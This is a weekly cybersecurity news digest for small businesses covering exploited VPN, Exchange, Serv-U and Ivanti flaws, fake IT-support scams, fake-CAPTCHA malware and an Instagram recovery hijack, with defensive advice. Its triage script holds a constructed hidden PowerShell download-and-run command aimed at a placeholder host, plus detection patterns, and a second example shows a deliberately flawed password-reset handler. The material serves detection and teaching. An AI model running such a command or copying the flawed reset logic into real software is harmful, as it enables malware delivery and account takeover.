This week’s cybersecurity news has a clear theme: attackers are going after the trusted paths people and businesses use every day. They are targeting VPNs, remote access gateways, Exchange servers, file-transfer systems, support workflows, browser prompts, and account recovery tools.
For individuals and small businesses, the issue is not just “another patch week.” These are the systems that connect remote workers, move customer files, protect email, recover social accounts, and help employees get IT support. When those trust paths fail, attackers can bypass passwords, steal files, hijack accounts, or convince someone to run malware themselves.
Here’s what happened, why it matters, and what you need to do about it.
1. Check Point VPN Flaw Was Exploited to Bypass Passwords
CISA added CVE-2026-50751 to its Known Exploited Vulnerabilities catalog on June 8 after active exploitation of a critical Check Point VPN flaw. The vulnerability affects Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol, and it can allow an unauthenticated remote attacker to establish a VPN connection without a valid user password.
SecurityWeek reported that the flaw carries a CVSS score of 9.3 and has been exploited in the wild as a zero-day. Check Point observed exploitation dating back to May 7, with increased activity in early June, and at least one confirmed attack tied to a Qilin ransomware affiliate.
This matters because VPNs are a front door into business networks. If attackers can bypass the password step and establish a VPN session, they may be able to move toward file shares, servers, remote desktops, and administrator tools. Even if more steps are needed after the VPN connection, the first barrier has already failed.
BET-R Actions: If you use Check Point VPN or firewall products, ask your IT provider whether IKEv1 is enabled for remote access and whether the hotfix has been applied. Disable deprecated VPN protocols where possible, require machine certificates, review VPN logs for unfamiliar sessions, and check for indicators of compromise from Check Point. Do not assume MFA alone solves this specific issue because the reported flaw can bypass password authentication at the VPN layer.
2. Microsoft’s June Patch Release Includes Exchange and Windows Issues Small Businesses Should Not Ignore
Microsoft’s June 2026 Patch Tuesday addressed roughly 200 vulnerabilities across Windows, Azure, Office, Outlook, Exchange, and AI tools. SecurityWeek reported that nearly 40 of the flaws were rated critical, and three publicly disclosed issues were assessed by Microsoft as “exploitation more likely.”
Microsoft also patched CVE-2026-42897, an actively exploited Exchange Server vulnerability affecting Exchange Server 2016, Exchange Server 2019, and Exchange Server Subscription Edition. BleepingComputer reported that the flaw can allow attackers to execute arbitrary JavaScript in cross-site scripting attacks targeting Outlook Web Access users, and Microsoft advised administrators to install the June 2026 Exchange security updates as soon as possible while keeping mitigations in place.
This matters for small businesses because patching Windows workstations is only part of the job. If your organization still runs on-premises Exchange, remote email access is a high-value target. If you use Windows devices with BitLocker, privilege escalation, or web server exposure, the June patch cycle also deserves attention.
BET-R Actions: Apply June 2026 Microsoft security updates across Windows endpoints and servers. If you run on-premises Exchange, prioritize the Exchange update immediately and confirm the Exchange Emergency Mitigation Service remains active. If you outsource IT, ask for written confirmation of which systems were patched, which failed, and which require reboots or maintenance windows. For laptops, verify BitLocker recovery key storage and do not skip reboot prompts after security updates.
3. SolarWinds Serv-U and Ivanti Sentry Show Why Admin Interfaces Should Not Be Exposed
CISA warned that attackers are exploiting CVE-2026-28318 in SolarWinds Serv-U, a file-transfer product used by organizations to move business data. SecurityWeek reported that unauthenticated attackers can exploit the flaw with specially crafted POST requests containing the Content-Encoding: deflate header to crash the Serv-U service. SolarWinds fixed the issue in Serv-U 15.5.4 Hotfix 1, and CISA urged federal agencies to patch by June 19.
CISA also added CVE-2026-10520, a maximum-severity Ivanti Sentry OS command injection vulnerability, to its exploited vulnerabilities catalog after honeypot exploitation attempts were observed. SecurityWeek reported that the flaw can allow remote, unauthenticated attackers to execute code with root privileges if vulnerable management interfaces are exposed, and Ivanti emphasized that the management port 8443 should never be internet-facing.
The lesson is simple: file-transfer systems, mobile gateways, and management interfaces are not “set it and forget it” systems. They often sit near sensitive data and privileged access, which makes them attractive to attackers.
BET-R Actions: Inventory file-transfer services, MDM gateways, VPN portals, RMM tools, firewalls, and administrative web portals. Remove direct internet exposure for management interfaces wherever possible. Patch SolarWinds Serv-U to 15.5.4 Hotfix 1 or later if affected. Patch Ivanti Sentry to the fixed versions and restrict access to port 8443. Add monitoring for service crashes, unexpected admin logins, new administrator accounts, and unusual file-transfer activity.
4. Silent Ransom Group Keeps Targeting Businesses Through Fake IT Support
BleepingComputer reported on June 7 that Silent Ransom Group, also tracked as UNC3753, Luna Moth, and Chatty Spider, is targeting U.S. law firms and professional services organizations through social engineering that often leads to data theft within hours. The attacks commonly begin with invoice-themed emails from consumer email accounts, followed by phone calls from people impersonating corporate IT staff.
Attackers convince victims to join remote support sessions through tools such as Microsoft Teams, Zoom, Quick Assist, Microsoft Terminal Services, AnyDesk, Zoho Assist, Bomgar, or SuperOps. They then search document management platforms and cloud repositories for contracts, tax records, Social Security numbers, merger and acquisition files, client records, and financial documents. Ransom demands can arrive within 30 minutes of the attackers leaving the victim environment, with threats to contact employees and clients directly.
This is high-impact for small businesses because it does not require a fancy exploit. A convincing phone call, a fake help desk domain, and a rushed employee can be enough.
BET-R Actions: Create a hard rule that IT support must be verified through a known number, ticketing system, or internal channel before any remote session starts. Block or restrict unauthorized remote-access tools. Train employees not to install support software from links sent in chats, emails, or private notes. Monitor for new installs of AnyDesk, Zoho Assist, Quick Assist, Rclone, WinSCP, and other remote or transfer tools. Restrict USB storage and review cloud storage access to sensitive client documents.
5. FTC Warns Fake CAPTCHA Prompts Are Installing Malware
The FTC warned about a phishing scam that looks like a normal CAPTCHA but tricks users into running commands on their own device. The fake prompt may tell users to press Windows + R, then Ctrl + V, then Enter. Instead of proving the user is human, the steps paste and run hidden malware.
This is dangerous because it abuses a familiar pattern. People are used to proving they are not robots, and attackers are using that muscle memory to bypass suspicion. A real CAPTCHA may ask you to select images, type letters, or solve a basic verification challenge. A real CAPTCHA will not ask you to run commands on your computer.
For individuals and small businesses, the risk includes stolen email logins, banking credentials, browser data, and account access. If this happens on a business workstation, the malware may expose company email, cloud apps, saved passwords, or client data.
BET-R Actions: Train users that any CAPTCHA asking for keyboard shortcuts, command prompts, PowerShell, Terminal, or pasted commands is malicious. If someone follows the steps, disconnect the device from the internet, preserve evidence, run endpoint security scans, and change passwords from a different trusted device. Enable two-factor authentication, but remember that stolen browser sessions can still be dangerous. Add browser and endpoint protections that block known malicious script execution where possible.
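Because the fake CAPTCHA relies on Win+R, every command the victim pastes is recorded in the Windows Run-dialog history (registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU). The following added example, which is not from the original article, triages exported RunMRU values for the paste-and-run indicators described above; the registry values and the hypothetical helper names are constructed for the demonstration.

```python
# Added example: triage Windows Run-dialog (Win+R) history for paste-and-run lures.
# RunMRU stores each command under values "a", "b", "c", ... with a trailing "\1";
# "MRUList" gives their most-recent-first order. The entries below are CONSTRUCTED.
import re

SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -ep bypass -c \"iwr http://example.invalid/x|iex\"\\1",
}

# Indicators typical of fake-CAPTCHA commands; a hit means "investigate", not proof.
SUSPICIOUS = [
    (r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|curl|bitsadmin)\b",
     "script/LOLBin host"),
    (r"-(w(indowstyle)?\s+hidden|nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b",
     "hidden/bypass switch"),
    (r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-expression|iex|downloadstring)\b", "download-and-run"),
    (r"https?://", "remote URL"),
    (r"\bcaptcha\b|i am not a robot|verification", "CAPTCHA-themed text"),
]

def parse_runmru(values):
    """Return Run-dialog commands, most recent first, with the trailing '\\1' stripped."""
    order = values.get("MRUList", "")
    cmds = []
    for key in order:
        if key in values:
            raw = values[key]
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds

def triage(values):
    """Classify every command: list of (command, [matched indicator names])."""
    results = []
    for cmd in parse_runmru(values):
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd, re.IGNORECASE)]
        results.append((cmd, reasons))
    return results

def suspicious_commands(values):
    """Only the commands that matched at least one indicator."""
    return [(cmd, why) for cmd, why in triage(values) if why]

if __name__ == "__main__":
    for cmd, why in suspicious_commands(SAMPLE_RUNMRU):
        print("SUSPICIOUS:", cmd, "->", ", ".join(why))
```

On a live host the values can be exported with `reg export` or read with PowerShell's `Get-ItemProperty` before the user clears the Run history.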
6. Meta AI Support Abuse Shows Account Recovery Can Become an Attack Path
Meta disclosed that 20,225 Instagram users had accounts hijacked after attackers abused Meta’s AI-powered High Touch Support account recovery system. BleepingComputer reported that the support flow did not properly verify whether a password reset email address matched the email address already associated with the targeted Instagram account. Attackers could receive reset links at attacker-controlled addresses and take over accounts that did not have two-factor authentication enabled.
Potentially exposed account data included email addresses, phone numbers, dates of birth, posts, photos, videos, stories, direct messages, profile information, account activity, and linked services. Meta disabled the affected support system and password reset links, enrolled potentially stolen accounts into security checkpoints, and required reauthentication.
This matters to small businesses because Instagram and Facebook accounts are business assets. A hijacked account can be used to scam customers, damage a brand, redirect payments, run fake promotions, steal ad account access, or impersonate a business owner.
BET-R Actions: Turn on two-factor authentication for business social media accounts and use authenticator apps or hardware keys where possible. Keep account recovery emails and phone numbers current. Limit who has admin access to Facebook, Instagram, Google Business Profile, LinkedIn, and ad accounts. Document recovery procedures before an account is hijacked. Review connected apps, ad payment methods, business managers, and delegated account access at least monthly.
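The recovery bug described above comes down to one missing comparison. The following added example, which is not Meta's code, shows a minimal reset handler with that bug beside a hardened version that only ever mails the address on file and requires a second factor on 2FA-enrolled accounts; the class and function names (Account, ResetService, request_reset_*) and the sample accounts are hypothetical.

```python
# Added example (not Meta's code): a password-reset flow with the "reset address
# is never compared to the address on file" bug, and the corrected version.
import secrets
from dataclasses import dataclass

@dataclass
class Account:
    username: str
    email: str              # address on file; the only place a reset link may go
    two_factor: bool = False
    password: str = ""

class ResetService:
    def __init__(self, accounts):
        self.accounts = {a.username: a for a in accounts}
        self.sent = []      # (destination email, token) pairs a mailer would deliver
        self.tokens = {}    # one-time token -> username

    def _issue_token(self, username):
        token = secrets.token_urlsafe(32)
        self.tokens[token] = username
        return token

    def request_reset_vulnerable(self, username, contact_email):
        """Bug: trusts the requester-supplied address and mails the link there."""
        token = self._issue_token(username)
        self.sent.append((contact_email, token))   # may be an attacker's inbox
        return contact_email

    def request_reset_fixed(self, username, contact_email):
        """Fix: the supplied address must match the address on file, and the link
        is sent only to the address on file. Returns the destination for the demo;
        the real HTTP response should be identical whether or not anything was sent."""
        acct = self.accounts.get(username)
        if acct is None or contact_email.strip().lower() != acct.email.lower():
            return None     # refuse and log; do not reveal whether the account exists
        token = self._issue_token(username)
        self.sent.append((acct.email, token))
        return acct.email

    def complete_reset(self, token, new_password, otp_ok=False):
        """Consume a single-use token; 2FA-enrolled accounts also need a valid OTP."""
        username = self.tokens.pop(token, None)
        if username is None:
            return False
        if self.accounts[username].two_factor and not otp_ok:
            return False
        self.accounts[username].password = new_password
        return True
```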
Recent Incidents This Week
The following organizations and systems were impacted by security incidents this week:
- Check Point VPN exploitation: CVE-2026-50751 was exploited to establish VPN sessions without valid passwords in vulnerable IKEv1 remote-access configurations.
  What this means for you: VPN protocol settings and hotfix status need immediate review.
- Microsoft June Patch Tuesday: Microsoft fixed roughly 200 vulnerabilities, including critical issues across Windows, Azure, Office, Outlook, Exchange, and AI tools.
  What this means for you: this is not a routine “patch whenever” month; prioritize exposed servers, Exchange, and endpoints.
- Exchange Server exploited issue: CVE-2026-42897 affects Exchange Server 2016, 2019, and Subscription Edition, and can target Outlook Web Access users.
  What this means for you: if you still run on-premises Exchange, patch and keep mitigations enabled.
- SolarWinds Serv-U exploitation: CVE-2026-28318 can let unauthenticated attackers crash vulnerable Serv-U file-transfer services.
  What this means for you: file-transfer systems need hotfixes, monitoring, and exposure review.
- Ivanti Sentry management exposure: CVE-2026-10520 can allow root-level code execution when vulnerable interfaces are exposed.
  What this means for you: management ports should not be internet-facing.
- Meta AI support account hijack: More than 20,000 Instagram accounts were hijacked through an AI-assisted account recovery flaw.
  What this means for you: social media recovery controls are part of business security.
How Individuals and Small Businesses Can Respond
Here’s what you can do this week to strengthen your security posture:
- Patch exposed systems first: Prioritize VPNs, firewalls, Exchange, file-transfer tools, MDM gateways, remote-management tools, and public admin panels.
- Disable old remote-access protocols: Review IKEv1, legacy VPN clients, old cipher settings, and any exception that keeps outdated access alive.
- Keep management interfaces private: Port 8443, appliance admin portals, router logins, RMM dashboards, and file-transfer consoles should be restricted to trusted networks or VPN-only access.
- Verify IT support requests: Require employees to confirm remote support through a known internal process before installing tools or granting screen access.
- Treat fake CAPTCHAs as malware attempts: No legitimate CAPTCHA should ask users to open Run, paste commands, or launch PowerShell, Terminal, or Command Prompt.
- Secure social accounts like business assets: Enable two-factor authentication, limit admins, document recovery steps, and review connected apps and ad payment settings.
- Watch for follow-up phishing: Breached accounts, stolen social access, and fake IT calls often lead to more believable scams afterward.
- Document patch status: Keep a simple record of what was updated, when, what failed, and who verified it.
- Review logs after urgent patches: Do not just patch and move on. Check whether the vulnerable service was accessed before the fix.
- Practice the first hour of response: Know who can isolate a device, revoke sessions, reset passwords, contact clients, preserve logs, and call outside help.
The main takeaway this week is that attackers are not only breaking into systems. They are abusing the processes people already trust: VPN login, support chats, password recovery, CAPTCHA prompts, file transfers, and remote IT sessions.
Break that trust chain. Patch what is exposed, verify who is asking for access, keep admin tools private, and give employees permission to pause before they click, install, approve, or run anything unexpected.
Citations:
The Hacker News: Critical Check Point VPN Flaw Exploited to Bypass Passwords in IKEv1 Remote Access
SecurityWeek: Check Point VPN Zero-Day Exploited in Qilin Ransomware Attacks
SecurityWeek: Microsoft Patches 200 Vulnerabilities
BleepingComputer: Microsoft patches Exchange Server zero-day exploited in attacks
SecurityWeek: SolarWinds Serv-U Vulnerability Exploited in the Wild
SecurityWeek: Ivanti Sentry Exploitation Attempts Hitting Honeypots
BleepingComputer: Silent Ransom Group targets law firms with fake IT support calls
FTC Consumer Advice: How to spot a CAPTCHA scam
BleepingComputer: Over 20,000 Instagram accounts stolen in Meta AI support hack
